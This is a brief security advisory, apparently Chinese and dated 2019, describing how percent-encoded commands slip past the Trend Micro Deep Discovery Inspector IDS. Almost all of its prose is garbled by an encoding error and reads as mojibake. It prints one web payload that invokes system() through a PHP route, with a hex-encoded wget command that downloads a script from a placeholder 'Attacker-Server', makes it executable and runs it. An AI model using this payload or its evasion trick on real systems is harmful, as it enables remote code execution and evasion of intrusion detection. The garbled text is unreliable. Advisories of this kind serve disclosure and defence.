Trend Micro Deep Discovery Inspector IDSÇå¾²ÈƹýÎó²îÇ徲ͨ¸æ

Ðû²¼Ê±¼ä 2019-07-26

Îó²î±àºÅºÍ¼¶±ð


CVE±àºÅ£ºÔÝÎÞ£¬Î£ÏÕ¼¶±ð£º¸ßΣ£¬CVSS·ÖÖµ£º¹Ù·½Î´ÆÀ¶¨


Ó°Ïì°æ±¾


ÊÜÓ°ÏìµÄ°æ±¾


Trend Micro Deep Discovery Inspector IDS


Îó²î¸ÅÊö


Trend Micro Deep Discovery Inspector IDS ÊÇÒ»ÖÖÍøÂç×°±¸£¬¿É¼à¿ØËùÓÐÀàÐͺÍÁè¼Ý105ÖÖ²î±ðµÄÍøÂçЭÒ飬ÒÔ·¢Ã÷ÊÕÖ§ÍøÂçµÄ¸ß¼¶ÍþвºÍÓÐÕë¶ÔÐԵĹ¥»÷¡£2019Äê7ÔÂ24ÈÕ£¬Ñо¿Ö°Ô±Åû¶ÁËTrend Micro Deep Discovery Inspector IDS Çå¾²ÈƹýÎó²îµÄÏêÇé¡£Çå¾²ÈƹýÎó²îÔ´ÓÚÍøÂçϵͳ»ò²úÆ·ÖÐȱÉÙÄÚÈÝÑéÖ¤¹æÔò»ò¶ÔÄÚÈÝÑé֤ǿ¶Èȱ·¦¡£


Îó²îÑéÖ¤


¾­Ì«¹ýÎö£¬IDS·¢Ã÷¶ñÒâϵͳÏÂÁÈç¡°Wget  Commandline  Injection¡±£©»á·¢³ö¾¯±¨£¬²¢ÇÒ½«ËüÃDZê¼ÇΪ¸ßΣº¦¡£¹¥»÷Õß½«payloadÓëͨË×µÄascii×Ö·ûÒ»Æð·¢ËÍ£¬ÀýÈç¡°wget¡±£¬×ÝÈ»ËüÃǾÙÐÐÁËÈç¡°\ x77 \ x67 \ x65 \ x74¡±µÄ±àÂ룬ÈԻᷢ³ö¾¯±¨¡£¿ÉÊÇ£¬¹¥»÷Õß¿ÉÒÔͨ¹ýÔÚHEXÖÐÒÔ°Ù·ÖºÅ×Ö·û¡°£¥¡±¿ªÍ·µÄ¶ñÒâÏÂÁîÀ´ÇáËÉÈƹýÕâЩ¾¯±¨£¬ÀýÈ磬¡°£¥77£¥ 67£¥65£¥74¡±Ò²×ª»»Îª¡°wget¡±£¬²»µ«²»»á±»±ê¼Ç»òÖÒÑÔ£¬Ò²¿ÉÒÔÔÚÄ¿µÄϵͳÉÏÖ´ÐС£


Payload£º


/index.php?s=/index/vulnerable/app/invoke&function=call_user_func_array&v ars[0]=system&vars[1][]=%77%67%65%74%20http://Attacker-Server/x.sh%20-O% 20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a


ÐÞ¸´½¨Òé


¹Ø×¢¹Ù·½ÍøÕ¾£¬ÊµÊ±ÏÂÔز¹¶¡¸üС£


²Î¿¼Á´½Ó